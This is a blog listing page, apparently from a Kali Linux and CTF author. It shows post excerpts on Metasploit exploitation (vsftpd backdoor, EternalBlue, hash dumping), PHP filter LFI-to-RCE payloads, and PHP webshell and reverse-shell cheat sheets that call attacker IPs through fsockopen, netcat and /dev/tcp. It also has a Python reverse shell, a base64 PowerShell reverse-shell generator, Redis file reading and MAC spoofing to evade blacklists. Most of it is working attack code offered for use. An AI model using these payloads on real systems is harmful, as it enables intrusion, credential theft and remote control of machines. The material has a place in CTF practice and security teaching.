Gajendra Mahato

Kali Docker Persistent Container

📂 Files

Dockerfile (placed in an empty folder):

    FROM kalilinux/kali-rolling
    ENV DEBIAN_FRONTEND=noninteractive TZ=Etc/UTC
    # install essentials: zsh sudo tzdata chrony util-linux iproute2
    RUN apt update && apt install -y \
        zsh sudo tzdata chrony util-linux iproute2 \
        && useradd -m -s /usr/bin/zsh kali \
        && echo "kali:kali" | chpasswd \
        && usermod -aG sudo kali \
        && apt clean && rm -rf /var/lib/apt/lists/*
    USER kali
    WORKDIR /home/kali
    ENTRYPOINT ["/usr/bin/zsh","-l"]

🛠️ Build Image

Run from the folder containing the Dockerfile:

    docker build -t kali-zsh-vm:privileged .

🚀 Create and Run Persistent Privileged Container

This creates kali-persistent with the host timezone and /tmp/test mounted ...

January 13, 2026 · 2 min

Metasploit Practical Guide (for Beginners and CTF use)

🌐 1. Start Metasploit Console

    sudo systemctl start postgresql
    msfconsole

Initialize the Metasploit Database (First Time Only)

    msfdb init

🔍 2. Scanning Targets

Quick Target Discovery

    nmap -sn 10.10.10.0/24

Full Port + Version Scan (Integrated with Metasploit DB)

    db_nmap -sC -sV -O -Pn 10.10.10.129

View Discovered Hosts & Services

    hosts
    services

🪡 3. Exploit Search and Module Use

Search by service name or CVE

    search vsftpd
    search type:exploit name:smb

Load a Module

    use exploit/unix/ftp/vsftpd_234_backdoor

Explore Module Info

    info            # Shows full module details (author, platform, options, etc)
    show options    # Required + optional settings (RHOSTS, LHOST, etc)
    show advanced   # Advanced options like threads, timeouts, proxies
    show payloads   # Compatible payloads for this exploit

💡 4. Linux Exploitation Workflow

Example: FTP Backdoor

    use exploit/unix/ftp/vsftpd_234_backdoor
    set RHOSTS 10.10.10.129
    set payload cmd/unix/interact
    run

If Shell is Basic: Upgrade

    python3 -c 'import pty; pty.spawn("/bin/bash")'

Or Use Web Delivery

    use exploit/multi/script/web_delivery
    set payload linux/x86/meterpreter/reverse_tcp
    set LHOST <your_ip>
    set LPORT 4444
    run

Post-Exploitation (Linux)

    sessions -i 1
    getuid
    sysinfo

Enumerate OS and Configs

    run post/linux/gather/enum_os
    run post/linux/gather/enum_configs

Dump Password Hashes

    download /etc/passwd
    download /etc/shadow
    john shadow --wordlist=/usr/share/wordlists/rockyou.txt

Local Exploit Suggestion

    run post/multi/recon/local_exploit_suggester

Example Local Root Exploit

    use exploit/linux/local/dirty_cow
    set SESSION 1
    run

Confirm Root

    id
    whoami

💻 5. Windows Exploitation Workflow

Example: EternalBlue

    use exploit/windows/smb/ms17_010_eternalblue
    set RHOSTS 10.10.10.130
    set LHOST <your_ip>
    set payload windows/x64/meterpreter/reverse_tcp
    run

Session Handling

    sessions
    sessions -i 1
    sysinfo
    getuid

Post-Exploitation (Windows)

Dump Hashes

    hashdump
    load kiwi
    kiwi_cmd "lsadump::sam"

Process Migration

    ps
    migrate <pid>
    getpid

Privilege Escalation

    getsystem

Or use: ...

January 13, 2026 · 2 min

Payloads and Outputs

Target File: .htaccess

Output with PHP String Filters

No Filter Applied
Output: Testing PHP Filter

Payload: php://filter/convert.base64-encode/resource=.htaccess
Output: VGVzdGluZyBQSFAgRmlsdGVy

Payload: php://filter/string.rot13/resource=.htaccess
Output: Grfgvat CUC Svygre

Payload: php://filter/string.toupper/resource=.htaccess
Output: TESTING PHP FILTER

Payload: php://filter/string.tolower/resource=.htaccess
Output: testing php filter

Payload: php://filter/string.strip_tags/resource=.htaccess
Output: Testing PHP Filter
This filter removes any HTML or PHP tags from the file contents.

PHP Payload: <?php system($_GET['cmd']); echo 'Shell done!'; ?>

Payload for LFI to RCE: php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+&cmd=whoami
Output: www-data

January 13, 2026 · 1 min

PHP Reverse Shell & Webshell Cheat Sheet

This cheat sheet contains common PHP reverse shells and webshell snippets that work in different scenarios.

1. Basic Webshell Using system()

    <?php system($_GET['cmd']); ?>

Usage: Execute commands by passing the cmd parameter in the URL.
Example: http://target.com/webshell.php?cmd=ls

2. PHP Reverse Shell Using One-liner with fsockopen()

    php -r '$sock=fsockopen("10.9.50.114",3232);exec("/bin/sh -i <&3 >&3 2>&3");'

Run this on the target if you can execute PHP code directly. Connects back to your listener on port 3232.

3. PHP Reverse Shell Using Named Pipe & Netcat

    <?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.50.114 4242 >/tmp/f")?>

Uses a named pipe (/tmp/f) for a stable reverse shell. Requires nc (Netcat) on the target machine.

4. PHP One-liner Bash Reverse Shell (Backgrounded)

    <?PHP exec("nohup /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.5/9001 0>&1' > /dev/null 2>&1 &"); ?>

Runs the bash reverse shell in the background. Useful to keep the shell persistent after the HTTP request ends.

🔥 Tips & Notes

- Replace IP and ports with your attacker machine’s IP and desired port.
- Use nc -lvnp <port> on your machine to catch the reverse shell.
- Some functions like exec(), system() might be disabled — test alternatives (passthru(), shell_exec(), popen()).
- If nc is not installed on the target, try pure PHP or bash based shells.
- Always check if the web server user has permissions to execute commands or create named pipes.
- Combine these shells with Chankro or php-reverse-shell for better evasion.

January 13, 2026 · 2 min

Python Reverse Shell Cheat Sheet

This cheat sheet shows useful Python reverse shell one-liners and a PowerShell reverse shell generator in Python.

1. Python3 Reverse Shell One-liner

    python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.50.114",3232));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Connects back to attacker IP 10.9.50.114 on port 3232. Uses socket, duplicates file descriptors for stdin/stdout/stderr. Spawns an interactive /bin/sh shell. Works on most Linux systems with Python 3 installed.

2. Python Script to Generate PowerShell Reverse Shell Command (Base64 Encoded)

    #!/usr/bin/env python3
    import sys
    import base64

    def help():
        print("USAGE: %s IP PORT" % sys.argv[0])
        print("Returns reverse shell PowerShell base64 encoded cmdline payload connecting to IP:PORT")
        exit()

    try:
        (ip, port) = (sys.argv[1], int(sys.argv[2]))
    except:
        help()

    payload = '$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
    payload = payload % (ip, port)
    cmdline = "powershell -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()
    print(cmdline)

How to use: Run this script: ...

January 13, 2026 · 2 min

Reading a File in Redis-CLI Interactive Shell

Redis allows the execution of Lua scripts through the EVAL command. If Redis is misconfigured or exposed to attackers, the Lua scripting engine can be used to execute arbitrary commands, including reading files on the system.

File Read via EVAL Command

You can read the contents of a file (e.g., /flag.txt) using the EVAL command in the Redis interactive shell:

    EVAL "return io.popen('cat /flag.txt'):read('*a')" 0

January 13, 2026 · 1 min

Rules for Kali Linux facebook group

1. Stay Focused on Learning & Skill Development: This group is a knowledge hub for ethical hacking, cybersecurity, and Kali Linux.
✅ Ask questions, share knowledge, and help each other grow!
✅ All posts must be relevant to these topics.
🚫 Basic Kali errors? Ask in the Community Chat, not as a post.
💡 Tip: Search before asking! Many common issues are already discussed. We’re here to learn, not to clutter the group with unnecessary posts. ...

January 13, 2026 · 3 min

Rules for Kali Linux facebook group

1. Focus on Learning and Skill Development: The primary focus of this group is to provide a platform for discussions, sharing, and collaboration related to ethical hacking, cybersecurity and Kali Linux. Members are encouraged to ask questions and share their knowledge and experiences to improve their skills and understanding of these topics. All posts related to these topics are welcome and encouraged. But asking for assistance with basic errors in Kali Linux may not be approved. So, please ask in the Community Chat. ...

January 13, 2026 · 3 min

Scanning `rpcbind` on the Network

To scan for rpcbind on a network and check NFS shares, use the following command:

    sudo nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount $IP   # Scan port 111 for rpcbind and list NFS shares

Listing Mounted Partitions on the Network

To list the exported partitions of a network system, use:

    showmount -e $IP   # List the exported directories on the NFS server

Mounting rpcbind Directories on Local Machine

To mount a remote NFS directory on the local machine: in this example, the directory /var is mounted from the remote server with IP 10.10.122.178. ...

January 13, 2026 · 2 min

Spoofing MAC Address in a Persistent fashion

This method allows users to change their WiFi adapter’s MAC address persistently. It also enables users to bypass MAC address blacklisting by network owners, as it allows connection to WiFi networks with a spoofed MAC address.

Step 1: Writing a systemd Service

Create a systemd service to change your MAC address and place it in the /etc/systemd/system/ directory with the name mac-spoofer.service.

    cat /etc/systemd/system/mac-spoofer.service

    [Unit]
    Description=MAC Address Change/spoofing wlo1
    Wants=network-pre.target
    Before=network-pre.target
    BindsTo=sys-subsystem-net-devices-wlo1.device
    After=sys-subsystem-net-devices-wlo1.device

    [Service]
    Type=oneshot
    User=root
    ExecStart=/usr/bin/ifconfig wlo1 down
    ExecStart=/usr/bin/macchanger -r -b wlo1
    ExecStart=/usr/bin/ifconfig wlo1 up

    [Install]
    WantedBy=multi-user.target

Step 2: Creating a Dispatcher Script

Create a script in the /etc/NetworkManager/dispatcher.d/ directory and grant it executable permission. This directory contains scripts that handle various network-related events; NetworkManager runs them automatically in response to specific events. ...

January 13, 2026 · 2 min